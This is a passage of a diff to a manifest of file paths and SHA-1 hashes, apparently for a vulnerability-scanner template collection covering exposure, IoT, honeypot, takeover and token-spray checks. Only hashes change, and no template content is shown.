 http/exposures/configs/websheets-config.yaml:67bc35212f547fe387b10b5dcd17b639b0f40a8c
 http/exposures/configs/wgetrc-config.yaml:b8883511cc258ae3cef04bae01de6155109dd772
-http/exposures/configs/wpconfig-aws-keys.yaml:b7a010abea8ee72e3c7ffb7602f2fd10b77d9f41
+http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5e3e949
 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880
-http/exposures/configs/yii-debugger.yaml:ea6beec4c6f22d31b0402f8ad1590aa8d87166de
-http/exposures/configs/zend-config-file.yaml:dd51767a5f5fbbc68e0d0f2f82ecaf7eb390a47b
+http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671
+http/exposures/configs/zend-config-file.yaml:52e91071cd3c7deef4d59c107bb81cb7c0024793
+http/exposures/docker-daemon-exposed.yaml:7058b14b309a1b24bf20748bc1d7672987f061de
 http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017
 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b
 http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90
@@ -4342,50 +4356,50 @@ http/exposures/files/wp-cli-exposure.yaml:d9e27d25f01d5b26858e334947530ff034342a
 http/exposures/files/ws-ftp-ini.yaml:ffbaf9232ce17ee4df0fc39fae078b3796f9e775
 http/exposures/files/xampp-environment-variables.yaml:66ea465f3a342daf96f8e319f9efe6b7d5c2a8e4
 http/exposures/files/yarn-lock.yaml:c2bda15eccc772bc5558c0161e3ca23daba8a377
-http/exposures/logs/access-log.yaml:7f7c3c4632703c95fcc6af327205d199dc29d221
-http/exposures/logs/badarg-log.yaml:3f5f7f78e53b7596900c3b168ccde37244e5b927
-http/exposures/logs/clockwork-php-page.yaml:add36e816fdc7271e7e618c642f8dbb081fff33f
+http/exposures/logs/access-log.yaml:27e3371ed77ea93e3174517b80eb6f84ca9f5980
+http/exposures/logs/badarg-log.yaml:2bb2b02f9ba7bff47a733066d2aa560f33e36051
+http/exposures/logs/clockwork-php-page.yaml:cfe04b47716a30cc2570990e0bad31549db93f0b
 http/exposures/logs/darkstat-detect.yaml:27249feadc758fe3a1febc93221581a4cd949f39
-http/exposures/logs/development-logs.yaml:f12cc16910c9e04d9ec38f2ccdae4abba210400d
-http/exposures/logs/django-debug-exposure.yaml:6f45f18fc39685b5f97c1bbb10385b55cbf847af
+http/exposures/logs/development-logs.yaml:7ac242fe7f0381b896abdb10d387c98e93b3dc97
+http/exposures/logs/django-debug-exposure.yaml:abd2a8bf74edb70e893b6cc3ad872f30072a32b5
 http/exposures/logs/dozzle-container-logs.yaml:06ff374b87484f1f2020b179c702d0699b18a420
 http/exposures/logs/elmah-log-file.yaml:f36a5a5a0362cb042477717ced54a714cdf51ba6
-http/exposures/logs/error-logs.yaml:58f974b27ac34af1f50207484b4a96d7e78c8867
-http/exposures/logs/event-debug-server-status.yaml:8ce38c7726f7439b4ae137c0e59dd2904bc0b2e7
+http/exposures/logs/error-logs.yaml:82ec94df93e6e24cb2058e41725275cc62004055
+http/exposures/logs/event-debug-server-status.yaml:87345798d5bc327bbef0b0dbc13d5aff09eb65e2
 http/exposures/logs/exposed-glances-api.yaml:687cfc585e23fb4f129877f77d06f7b92fadec63
 http/exposures/logs/fastcgi-echo.yaml:5d68080e6a3ccda180adae733cf7c80a9851a46c
-http/exposures/logs/ffserver-status.yaml:e81e43a8af704c38d5d3d168dba791d5f45f2e87
-http/exposures/logs/firebase-debug-log.yaml:8cb3594ac0217f7a8a5731ecee2dca193cdd9f95
-http/exposures/logs/git-exposure.yaml:14a4dd7d5f7cab9505f749da4fff9496193b96b4
+http/exposures/logs/ffserver-status.yaml:c4c11caaf13ef1cd20b8741722d3b0538a4534d2
+http/exposures/logs/firebase-debug-log.yaml:6f84b85f5a67407e83870b621c0682256f2832b6
+http/exposures/logs/git-exposure.yaml:15ab1ca064dbaa8a39e5fd8a1b459d1d32dc03c3
 http/exposures/logs/git-logs-exposure.yaml:06138e347596d1344fa85579245cde8a0297bc46
 http/exposures/logs/idea-logs-exposure.yaml:d2b71377162490192d2a5f096fa4f56786a5aad4
-http/exposures/logs/jboss-seam-debug-page.yaml:d08a0824585bd1e297c84358b7f8fe5e51f4059c
+http/exposures/logs/jboss-seam-debug-page.yaml:c748e1d924b75944e21a3b926e65397361d825e0
 http/exposures/logs/laravel-log-file.yaml:1c9256915860d67aabaccbb36beddf9f1eca7f63
 http/exposures/logs/laravel-telescope.yaml:52ec6e31e7704b09600f0386dd049e77828ae0bc
-http/exposures/logs/lucee-stack-trace.yaml:e597cd1f111330d520af051bfaa43eeefd541ba4
+http/exposures/logs/lucee-stack-trace.yaml:467fad25796a3cd7ace8de52ce488d3b406b992b
 http/exposures/logs/milesight-system-log.yaml:146c8e0e4729e0687e7c0b814942e4f37f60dd98
-http/exposures/logs/nginx-shards.yaml:213ea3f256eebd6e3c6a44dedef7430eb6d0c943
-http/exposures/logs/npm-debug-log.yaml:2db34096387d6fb976187bebcddc479f1d09e48b
+http/exposures/logs/nginx-shards.yaml:c0f921f492ac11aac013022038971c3b584273d3
+http/exposures/logs/npm-debug-log.yaml:9cd953efaaf59cf8e0ded9097c2ed6d8aeb33f0c
 http/exposures/logs/npm-log-file.yaml:678df00c6bc380c59fadcc0780c19c45b2f95f4e
-http/exposures/logs/opentsdb-status.yaml:ce20da7f842cd16428de7c5b2c1e8c93441cdb57
+http/exposures/logs/opentsdb-status.yaml:a01beff3427d5e4b30542bce769aeb32d530b72f
 http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml:286849afc77b0f3acac411969b7e7ce0b3003ed2
 http/exposures/logs/php-debug-bar.yaml:be111f2f82d5b76f89e74138c6842911eee44afd
-http/exposures/logs/production-log.yaml:224aca93c0ec624ecfb23c06e4d3844c614e2d2b
-http/exposures/logs/production-logs.yaml:e5a4e4d8bfc00be750b13eda877590313addace6
+http/exposures/logs/production-log.yaml:f734ed34e8fd6eb387429224da7044b601a07df9
+http/exposures/logs/production-logs.yaml:677b383d090fc7653f3589a9a26f377a5a1ef321
 http/exposures/logs/pyramid-debug-toolbar.yaml:bea48f6faf39793e2515c6176595cb2ad7c061b6
-http/exposures/logs/rails-debug-mode.yaml:237efeda6b24a7a11fb23f43cd9b51ebaf996d52
-http/exposures/logs/redis-exception-error.yaml:5a469720bab94bb2f52e28aaa27c668d209adfac
+http/exposures/logs/rails-debug-mode.yaml:35b2fc2542e911f45fc43c9b7626c9b08e948f3a
+http/exposures/logs/redis-exception-error.yaml:501efe20402074733f8cea4256893da5cda5924a
 http/exposures/logs/redv-super-logs.yaml:6c1f653bdbfcb064d83ac5cc8405407941261f48
-http/exposures/logs/roundcube-log-disclosure.yaml:bf179a71c67cc9fc25ce693a6ffd71343ced2a95
+http/exposures/logs/roundcube-log-disclosure.yaml:c10ee65311ed008e58470e2f33e70a283bbe2229
 http/exposures/logs/squid-analysis-report-generator.yaml:6fd300a0bdb813fedab1afd52e4f0d03b8e1ab35
-http/exposures/logs/struts-debug-mode.yaml:fce5945d07f626d17b6252f172bb9bf1c26aa5f6
+http/exposures/logs/struts-debug-mode.yaml:1e3dbbca8b63398a837d712471b7c5d1b27876b8
 http/exposures/logs/struts-problem-report.yaml:4ceadc53f20790df85828ba96eef8c7ff3df8d8d
-http/exposures/logs/trace-axd-detect.yaml:0aff462332f37b428a73e919701df63ee08e7cad
-http/exposures/logs/webalizer-xtended-stats.yaml:f9bee5a036be7ec073fcc51668f0ff09c9dd9065
-http/exposures/logs/wp-app-log.yaml:ee1eb8f0a985e8b87b981d422ce345b3042a5215
-http/exposures/logs/ws-ftp-log.yaml:0a77fbed633c63d43bed8256076cf2d41e6f85d5
-http/exposures/logs/yii-error-page.yaml:b33fd67138ae3646fc4bb5f0e6dde3dd938fc4a3
-http/exposures/logs/zm-system-log-detect.yaml:d1fcf7d081b11df068bb26ac09e36795f5e301e2
+http/exposures/logs/trace-axd-detect.yaml:98312d493233dd4517cd42a0fc56a9fad1f5cbba
+http/exposures/logs/webalizer-xtended-stats.yaml:bf054a5d94f19b3c3e3b3884a8a89c24fdb54c30
+http/exposures/logs/wp-app-log.yaml:e7a51aa278badad6fc9bf96ab8bc31cf97e6f830
+http/exposures/logs/ws-ftp-log.yaml:978b1211fa11813a6de465f7f51235b49c0f4a95
+http/exposures/logs/yii-error-page.yaml:7421936fbd01ac2fe734927dacd80356c3588a4c
+http/exposures/logs/zm-system-log-detect.yaml:25e6e933ef661e9a610a783255f9ce94f8be8a32
 http/exposures/tokens/adafruit/adafruit-api-key.yaml:885905c5e28cea42e754a960772a1222b8b2099c
 http/exposures/tokens/adobe/adobe-client-id.yaml:0e6bdb72cce43b93700f875b1daf9aac14d77f37
 http/exposures/tokens/adobe/adobe-oauth-secret.yaml:675530296bd9471b2a09f835274123700eec20f7
@@ -4547,55 +4561,55 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb
 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25
 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa
 http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5
-http/iot/ampguard-wifi-setup.yaml:2e3220db4b11d9fac562058ee53e47c79f58b508
+http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb
 http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117
 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19
-http/iot/brother-printer-detect.yaml:bf04f05e08b383c000eae9f945dc0e7f85ec0f66
-http/iot/brother-unauthorized-access.yaml:c92abe83724aa03411d2f091f52b59779766b9c2
-http/iot/carel-plantvisor-panel.yaml:8fc7dc6161b5ec1bdbfed3a85556dacd0625e6aa
+http/iot/brother-printer-detect.yaml:84d94016ae8e1f9fcb8e4a642ce0e27c70ff323d
+http/iot/brother-unauthorized-access.yaml:68661b93e16c5e72d2b06ce4f7d30a012dfd17e6
+http/iot/carel-plantvisor-panel.yaml:22a21a07c9e630c2de852b7b310829ebe3b58155
 http/iot/codian-mcu-login.yaml:1d26988adfc824251ed4721d310c9fe29d39a223
 http/iot/contacam.yaml:ae4da861a8538f1f3363825cb2483e4acdde20d9
 http/iot/envision-gateway.yaml:8eaecc86a76b4ca75a5c50df3069347565d77e01
 http/iot/epmp-login.yaml:a7ca3cf1054335045eed1751ee3876ee0fa97e43
 http/iot/epson-wf-series.yaml:046091d9f265b2b562ea98cc3cab98e8b2ec8469
-http/iot/grandstream-device-configuration.yaml:c5d7ab59f45fd9ae89b81a6d3fc39824074ad332
+http/iot/grandstream-device-configuration.yaml:296b7c0be8d488e6d7d5e653b5f0c16a78ba217a
 http/iot/heatmiser-wifi-thermostat.yaml:8948b3189763d2d223a58b5f963fe8c7061b43f0
-http/iot/homeworks-illumination.yaml:6cb18a23c3151702ab52ada43a4a357662319e5e
-http/iot/honeywell-building-control.yaml:01760c7e491ed5037395d03a38da0bf4c0e6b91a
-http/iot/hp-color-laserjet-detect.yaml:e4939d9b4953b9c795ac3440d6db33f6b30c9ab6
+http/iot/homeworks-illumination.yaml:5bdca1bc4b9e5c60ed3bb2de536f1a3fec4744dc
+http/iot/honeywell-building-control.yaml:bd40188b96d5fde3ed5eb5a3364a1e30bbb2274d
+http/iot/hp-color-laserjet-detect.yaml:5f74ab61da4307fc8f6640806d769ea7978b2c66
 http/iot/hp-device-info-detect.yaml:027db15d11df0cac8749d98938c3b7f5ca772618
 http/iot/hp-laserjet-detect.yaml:003029dd6ea93d52adafa939421823cb600c5573
-http/iot/huawei-home-gateway.yaml:3123849600dc8f953d4ae0c11ea0654c41f810eb
-http/iot/hue-personal-wireless-panel.yaml:767838bd7e02b7936ab5a216d5d41dc4f64323fe
+http/iot/huawei-home-gateway.yaml:fe7066b08bf257a13a6cf319cd84c099206d4065
+http/iot/hue-personal-wireless-panel.yaml:bf80da1db76e38b21a79a2d1c1e606d0d8ae17bb
 http/iot/internet-service.yaml:c9f1cf966aa3cfba926f26bc4d6c08f7420998a4
 http/iot/iotawatt-app-exposure.yaml:9127c8ba9a2b0eb2fe9aa16d80e6c4db7e79b8cc
 http/iot/kevinlab-device-detect.yaml:f720c924dba7c3a9003b2bf59be19a243aaa4def
 http/iot/kyocera-printer-panel.yaml:5b08e5c806a53fabb858dcc30eb35788c1140693
 http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271
-http/iot/loytec-device.yaml:9fd7c9818a34d9588e17d59286416f85d38e6bcd
+http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183
 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032
 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e
-http/iot/network-camera-detect.yaml:a72fb939a81be5980142ca2ce08f94d25a7dd90f
+http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39
 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db
 http/iot/nuuno-network-login.yaml:3b35428057d9e4183cda35726bac0e77ca1feb31
 http/iot/octoprint-3dprinter-detect.yaml:0bd6260f4ea28523388fa00d17c4e586bd5788d4
 http/iot/open-mjpg-streamer.yaml:6ba3e1f034ac337e34749da1d9590ce89a0df99d
 http/iot/panasonic-network-management.yaml:4c9c1751800f3436091939c5ffccfb577fc23779
-http/iot/pqube-power-analyzers.yaml:e86987c1fe22ad62a5a15e96a10aed7261560c34
+http/iot/pqube-power-analyzers.yaml:c8b41eeb3d3ddc5d1da05b1120a95eb9e744a8e9
 http/iot/qvisdvr-deserialization-rce.yaml:cc43b2987dfbacc96331d23d26548421573fa174
 http/iot/raspberry-shake-config.yaml:6feab3607eabcdac8d9367ce94b3531ad21aebf4
 http/iot/routeros-login.yaml:435c0a9a68658b628253b1b4d062731d7cbcc75e
 http/iot/selea-ip-camera.yaml:4f2e543f35ef8b90efd105141f31bb51ebe87a1a
-http/iot/snapdrop-detect.yaml:3130d5c6e645004b868559d91e41b175991af715
-http/iot/stem-audio-table-private-keys.yaml:5fd597e2f4d9c6073a5594321189a6aedca83a19
+http/iot/snapdrop-detect.yaml:faf9f600e108fa5f08702bb57937dd5fca431c27
+http/iot/stem-audio-table-private-keys.yaml:835197bd74c0d0f948d0d0f690a9297ef52d7bd4
 http/iot/targa-camera-lfi.yaml:e66f56bccb2b3584863574b7c3fc5291381b5d1a
 http/iot/targa-camera-ssrf.yaml:933500224298709176e66ab629c6c60e5cdc45e1
-http/iot/ulanzi-clock.yaml:bd513e175213c22bd430cddf5adbce085a7b4e00
-http/iot/upnp-device.yaml:e67f315eb6280592158c212b78588c95ac12248d
+http/iot/ulanzi-clock.yaml:7c0746d609e40f6b798f50953915dc99bf44d612
+http/iot/upnp-device.yaml:91a3a1da0bd6bd5a7050f832cdfd24e47c16ef8f
 http/iot/webcamxp-5.yaml:efd0fb0d0bd75568ccb35553c60630bae3c530b0
-http/iot/webtools-home.yaml:4fa7e91b99490685fff3981a6be4af0cc11bdcee
+http/iot/webtools-home.yaml:aa461aa9c978a1faa22be96d8b0a3213613c6851
 http/iot/xp-webcam.yaml:768a1745b15df77268656ab1e8c72c6fca7db3cf
-http/iot/zebra-printer-detect.yaml:3c195229ca68d37162d6e6dfefec1b1c02d663f7
+http/iot/zebra-printer-detect.yaml:491a007c29769934e37fb4edfe93353464edaad6
 http/miscellaneous/addeventlistener-detect.yaml:a9e8c11907184361cfe9f081be9fcfbe25287382
 http/miscellaneous/apple-app-site-association.yaml:536e1ca154f5a07947c5145a32d17ee2310a2d0d
 http/miscellaneous/aws-ecs-container-agent-tasks.yaml:0f7802a55cbc69161e11d0784571cb272ee68c33
@@ -5803,73 +5817,73 @@ http/osint/zoomitir.yaml:deb452a0a5dd3bbfad1feadbacc72e7c97ba832f
 http/takeovers/aftership-takeover.yaml:439029c5274c5551fd7a3987e35cbf386349be83
 http/takeovers/agilecrm-takeover.yaml:e9494110d7e536b0396bcbb14066007f20fb638e
 http/takeovers/aha-takeover.yaml:58e3e7a7486be85c7687c793b5663b84759788a8
-http/takeovers/airee-takeover.yaml:15e77a8f1003255e310e474a6affece9d95d7dc6
-http/takeovers/anima-takeover.yaml:5285d4d4fa59a403850fcaa2bb1ad8cf5926f8c8
-http/takeovers/announcekit-takeover.yaml:b457ab06f3beb1c3c119180be6198aaed52b847f
-http/takeovers/aws-bucket-takeover.yaml:54a2cfc150791c00a2a50b6ebcdfb15d33460532
-http/takeovers/bigcartel-takeover.yaml:db1dd96fe47f6745e5f4e1b1e2d2fca38a0f482b
-http/takeovers/bitbucket-takeover.yaml:af8da0f1f41a7bd7d236338ea8db2127c837dd93
-http/takeovers/campaignmonitor-takeover.yaml:3e1071ef60521c14f2d9b6ea19801b076f192744
-http/takeovers/canny-takeover.yaml:f217111a5ab9a5e75f8ab03d66bdcc594558f22c
-http/takeovers/cargo-takeover.yaml:c679cc0b44efdf7d8c087b49d6a11c1f7f68585f
-http/takeovers/cargocollective-takeover.yaml:71fbea2f81d9d1a2a20a913f2a81516efc7ab0f3
+http/takeovers/airee-takeover.yaml:bd00657159494039fc36913d03ddbf767fa1b93b
+http/takeovers/anima-takeover.yaml:959b664c800ede2e97646180a495f6295d916231
+http/takeovers/announcekit-takeover.yaml:92fb87a534f3f920e480a963886f8796836c8383
+http/takeovers/aws-bucket-takeover.yaml:195e8c743d8ae301556d84355e46d6f4b0f5e193
+http/takeovers/bigcartel-takeover.yaml:6a8f5abf7259eb5f4a4106653fc665b950b4190a
+http/takeovers/bitbucket-takeover.yaml:60402aa2ecf993deccac40923f21ce71974dc780
+http/takeovers/campaignmonitor-takeover.yaml:615bfc25c0b488b95d44a0eda7bb5d7af254cacf
+http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1
+http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452
+http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3
 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87
-http/takeovers/flexbe-takeover.yaml:80a7fa5fbdfde1749b731b585ca90418dc51ed42
-http/takeovers/flywheel-takeover.yaml:9d26cf835ccf9142b8487c2d40ae45d4e8c07d0d
-http/takeovers/frontify-takeover.yaml:52b459c9da21fcecbceb6c4e4c64d433987a4ed2
-http/takeovers/gemfury-takeover.yaml:e32c076a6b29f6bd053b612d7ebac8594fef0ca0
-http/takeovers/getresponse-takeover.yaml:6ed3399bd02051492c6acb483edb79142542ed32
-http/takeovers/ghost-takeover.yaml:b288f957c7b41aabb50377659723622237c902cd
-http/takeovers/gitbook-takeover.yaml:542c119aeb74cefcf12ac637d39db44df24884b3
-http/takeovers/github-takeover.yaml:7a6426d00a7c4aa45b38c6aeae4df543c14eae02
-http/takeovers/hatenablog-takeover.yaml:a8631556c93165979f52f818838115b79ab3d3fc
-http/takeovers/helpjuice-takeover.yaml:f344e0d1ad438e9b6781042f833ac68716ba7a0c
-http/takeovers/helprace-takeover.yaml:24e604d1c41836c5fe8909cc62fb4f919cc3fc1e
-http/takeovers/helpscout-takeover.yaml:f47cc4527c54b383614153ebf667959f29441f9c
-http/takeovers/hubspot-takeover.yaml:a6f7efb09cfd037ea2e2bc973c6f5b412dfa1b6f
-http/takeovers/intercom-takeover.yaml:36487179a3c1a48e29cd053ce93b6d1edb558339
-http/takeovers/jazzhr-takeover.yaml:7b16845a87d307e7d1670dff0d398403621a26ec
-http/takeovers/jetbrains-takeover.yaml:677ee4f412fcdfff42db85e3fe0689f65c5d0685
-http/takeovers/kinsta-takeover.yaml:2b7542485b7ea40e8ec482eec59deba7612ab529
-http/takeovers/launchrock-takeover.yaml:3fe0acfb6cb21ece3e4cbd3d044017aba45bc626
-http/takeovers/leadpages-takeover.yaml:f0cb725e453b07a2d26de341186540e5a5155d94
+http/takeovers/flexbe-takeover.yaml:beb769a298f11ffc28a49fbdc3f9e15c4d22a181
+http/takeovers/flywheel-takeover.yaml:61d2bc14e417d1dca72d6c392f1e8df707b28300
+http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb
+http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68
+http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd
+http/takeovers/ghost-takeover.yaml:1302f558b7babb99a557a5b91e3e9cb4f5f7eb75
+http/takeovers/gitbook-takeover.yaml:d552ad1c4821e8f77e4fcda9126f8aa5c736c7b1
+http/takeovers/github-takeover.yaml:41bdd2fbe295a5faf309d521f8789ae317d4a563
+http/takeovers/hatenablog-takeover.yaml:fc21976cb0c4a8fbad25b611c142c08ec4d62ac8
+http/takeovers/helpjuice-takeover.yaml:5147fe356cc08f47440019580263508e1ae23985
+http/takeovers/helprace-takeover.yaml:49c3264822b8ad59265004d9c59e54092ad6ab0c
+http/takeovers/helpscout-takeover.yaml:1d283328f15ec4bda0c00b289ec1f4f794386ee3
+http/takeovers/hubspot-takeover.yaml:259ec7b257f0a97fdf4072fbdd95f0d24e4a44c5
+http/takeovers/intercom-takeover.yaml:1b9b0afce9a7bff6feccb2008af6703773824887
+http/takeovers/jazzhr-takeover.yaml:45651efc7c734e82c68a2b7b7abe69f93a940fa1
+http/takeovers/jetbrains-takeover.yaml:2ef07afb2359adc45aae0497c1015a4771fc92da
+http/takeovers/kinsta-takeover.yaml:82ff78f9f49bf78183233e37895b210787e68e5d
+http/takeovers/launchrock-takeover.yaml:bc3a23ba12749cc8e833d97fc8ce5ecc3070c641
+http/takeovers/leadpages-takeover.yaml:0fac504c6dd06006e13b6fdfa008710066294475
 http/takeovers/lemlist-takeover.yaml:9ecff3bc0bc8306be6253f9204d080f137596806
-http/takeovers/mashery-takeover.yaml:70564ecba62e47058d4b5e6fc8716d042bd6170a
-http/takeovers/meteor-takeover.yaml:7f5bc1cffca1773d76096ac61db40d381c739a94
-http/takeovers/netlify-takeover.yaml:27f89d9e54c83fa01db278eb7db6d12e0c72755e
-http/takeovers/ngrok-takeover.yaml:33734965ec775389a1fba3247e8e76ada2d356a6
-http/takeovers/pagewiz-takeover.yaml:bab720c0a2cb261afacdc41f10d6e91adc77817c
-http/takeovers/pantheon-takeover.yaml:2f0f6948bb6abdb964673b4f346e640e5f8dff3c
-http/takeovers/pingdom-takeover.yaml:448bc29d71e1c7072f4716d9018c03055c480bbf
-http/takeovers/proposify-takeover.yaml:26fd16726a95fcea062d61f1231757291cc2a082
-http/takeovers/readme-takeover.yaml:694913d1c17f16305c72adbec0c0180bf310b4d0
-http/takeovers/readthedocs-takeover.yaml:e5c01e6b624cfa130eabea28f4e5b4a494ade07d
-http/takeovers/shopify-takeover.yaml:882f81d5759b026a334a6ca855e0f09907a806c7
-http/takeovers/short-io.yaml:ad7709f74ddd7d777a06d63f383048474322ae2f
-http/takeovers/simplebooklet-takeover.yaml:544c3baaa345172c03af87e9b030d40fe5bf7ab4
-http/takeovers/smartjob-takeover.yaml:a6fdd70fcd6908fff6b162e0f3d834fb0d01e9f1
-http/takeovers/smugmug-takeover.yaml:94a8deb8bc1d56cd51101bdc5e229b65f4cd9320
-http/takeovers/sprintful-takeover.yaml:c5e2e5c97d97afed1f761a6efaf3cf4e1cb14dc3
-http/takeovers/strikingly-takeover.yaml:d1294f93d15617cd897b5a24858c9173804ad0e6
-http/takeovers/surge-takeover.yaml:00c5960daaa869f334807a0dd200e27a53416a6b
-http/takeovers/surveygizmo-takeover.yaml:96be70686c1541075739d26ac101fae1ede57940
-http/takeovers/surveysparrow-takeover.yaml:dca835fd66691f7d8434b43702984c6d495b7f6c
-http/takeovers/tave-takeover.yaml:e2777c1cc094814ff69d0b16d59e4b9537977578
-http/takeovers/teamwork-takeover.yaml:d00c68539e871287bb90a159c92e1b2171ed5d8a
-http/takeovers/tilda-takeover.yaml:4a653f16b25f5e35de3562ebee19ae4b3f68822c
-http/takeovers/tumblr-takeover.yaml:b4be4f985641e1238b1f39cd397121c2073d24c7
-http/takeovers/uberflip-takeover.yaml:a2beafe9ed6389241c46ccfd7f95c2a9d7ce22de
-http/takeovers/uptimerobot-takeover.yaml:4789150d783356616ba58df21d83afbadcb789df
-http/takeovers/uservoice-takeover.yaml:0bc67569ec239ff5ca14f89147ea3015207e9750
-http/takeovers/vend-takeover.yaml:3b8a5b74c378853c3f7ab82ed85dc0ed9e06a669
-http/takeovers/vercel-takeover.yaml:fae062fd4285ab7c591ca080553c8a6651a7a5ba
-http/takeovers/webflow-takeover.yaml:2e34bdc0a040a5b79b30596a30d9e40cca2c4d54
-http/takeovers/wishpond-takeover.yaml:9192be67173d599a0de485a8495b87b90785be3c
+http/takeovers/mashery-takeover.yaml:93bb5ee3f03a4216b1d885448c97d315e154ddef
+http/takeovers/meteor-takeover.yaml:ff2cb391d01cdb8c4bed85f9eab188ee2030d917
+http/takeovers/netlify-takeover.yaml:13255b0011bb56f304fd939c9158a6c7c6172c4e
+http/takeovers/ngrok-takeover.yaml:4b03a530ce7f4d8be606c4e5d86594eca182e157
+http/takeovers/pagewiz-takeover.yaml:e0204acfea6a7947a2b6ac79b949585c03c928cc
+http/takeovers/pantheon-takeover.yaml:32223d5dbfb494c86bb74d0e3c9f3593e537d2ec
+http/takeovers/pingdom-takeover.yaml:d0b32dce1ec96bde02b58450744b7f653db954c5
+http/takeovers/proposify-takeover.yaml:a20f7e31b866d5a312b24762eb9c9c63a6f3fcd7
+http/takeovers/readme-takeover.yaml:e37babcec9941f90368d304de2ba65921434fdfc
+http/takeovers/readthedocs-takeover.yaml:6c814ab335095cc1d6e1135bc7cce56317042ce9
+http/takeovers/shopify-takeover.yaml:d05e891b76c2666903e0ec058799a82dbe1eb3ac
+http/takeovers/short-io.yaml:b0d47a64d093177e53bcc5ac16fea22d3ba45939
+http/takeovers/simplebooklet-takeover.yaml:448dd937d9559e0c6d180f9d96f41838d4ec67e8
+http/takeovers/smartjob-takeover.yaml:bb0363423b3208375c0c1f61ed48187b90057ee8
+http/takeovers/smugmug-takeover.yaml:6ea3ec73d535db0f8e87ea40aa458ac44a18f7d0
+http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864
+http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f
+http/takeovers/surge-takeover.yaml:c3c45bfbe18ad235a9a5a999c73172baf77cdb1f
+http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523
+http/takeovers/surveysparrow-takeover.yaml:1e8b06deab5ec653168e595223f3eb83bb043796
+http/takeovers/tave-takeover.yaml:36d44f071b52aad95c3496fd4afeb0c50effd4c2
+http/takeovers/teamwork-takeover.yaml:80d707c9c8edc27bffcc1e6652d671596cd736a2
+http/takeovers/tilda-takeover.yaml:3641f963d6caaf5d0c19d9fafc5164a13922ecf6
+http/takeovers/tumblr-takeover.yaml:b9ccf4e5f859efe2e752e99a45ab8fc976e4e2f8
+http/takeovers/uberflip-takeover.yaml:154d577b095dc78ddeb169bfbc15747a106e4abf
+http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef2
+http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472
+http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6
+http/takeovers/vercel-takeover.yaml:881400eef9e2d67febebc5bbb0ae8e8d40d190dd
+http/takeovers/webflow-takeover.yaml:04ee1fc244dea4b56e52a51b8833f3067055eccc
+http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3
 http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d
-http/takeovers/wordpress-takeover.yaml:c888a2c2ef5ade9a4fa652d32c0190fe916a0741
-http/takeovers/worksites-takeover.yaml:a46575c550d209106b9e241baddfacfec9975699
-http/takeovers/wufoo-takeover.yaml:506453aed9da3208df55567caf602b98eb0c7c90
-http/takeovers/zendesk-takeover.yaml:c0cac04342ff866a71d46d2f5d0ee7cd233a4531
+http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd
+http/takeovers/worksites-takeover.yaml:7e45dbb8cc2dd77c6333c212864c876c14a82d9c
+http/takeovers/wufoo-takeover.yaml:aa7373517bcaebe9e5e7ec202f07dd7ed9b02efe
+http/takeovers/zendesk-takeover.yaml:a47ca9f517bc4450ee17132060e6c7e97ee07a07
 http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b
 http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f
 http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9
@@ -6621,7 +6635,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7
 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2
 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a
 http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2
